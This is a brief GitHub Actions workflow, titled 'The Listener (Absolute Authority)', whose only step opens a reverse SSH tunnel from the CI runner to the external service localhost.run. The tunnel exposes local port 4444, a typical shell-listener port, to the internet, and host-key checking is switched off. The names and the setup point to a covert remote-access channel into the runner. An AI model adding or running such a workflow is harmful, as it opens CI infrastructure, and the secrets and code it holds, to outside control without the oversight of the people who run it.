name: The Listener (Absolute Authority)

on: [workflow_dispatch]

jobs:
  listen:
    runs-on: ubuntu-latest
    steps:
      - name: The Final Command
        run: |
          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -R 80:localhost:4444 nokey@localhost.run
